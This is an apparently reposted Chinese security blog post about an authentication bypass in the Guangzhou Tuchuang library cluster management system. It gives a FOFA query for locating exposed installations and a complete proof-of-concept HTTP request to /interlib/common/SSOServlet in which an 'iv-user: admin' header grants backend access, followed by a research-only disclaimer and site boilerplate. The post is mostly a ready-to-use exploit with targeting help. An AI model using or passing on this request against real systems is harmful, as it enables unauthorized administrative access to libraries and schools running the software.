广州图创计算机软件开发有限公司作为文旅行业信息化建设的领导者之一,应用5G、物联网、大数据、AI人工智能等创新技术打造出集咨询服务、产品研发、智能设备、数字资源服务、智慧空间设计、运营策划等为一体的高新技术企业,解决方案被广泛地应用于图书馆、文化馆、高校、中小学、企事业等行业,并投资控股多家文化行业科技企业,实现集团化发展。
广州图创计算机软件开发有限公司图书馆集群管理系统存在逻辑绕过,攻击者可通过此漏洞登录后台,从而造成不良影响。
fofa:
body="广州图创计算机软件开发有限公司"
添加header头部信息iv-user: admin 即可绕过登录。
poc:
GET /interlib/common/SSOServlet? HTTP/1.1Host:Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9iv-user: adminConnection: close
小知识
声明
好文推荐
原文始发于微信公众号(丁永博的成长日记):广州图创图书馆集群管理系统存在逻辑绕过
特别标注:
本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
- 我的微信
- 微信扫一扫
-
- 我的微信公众号
- 微信扫一扫
-
评论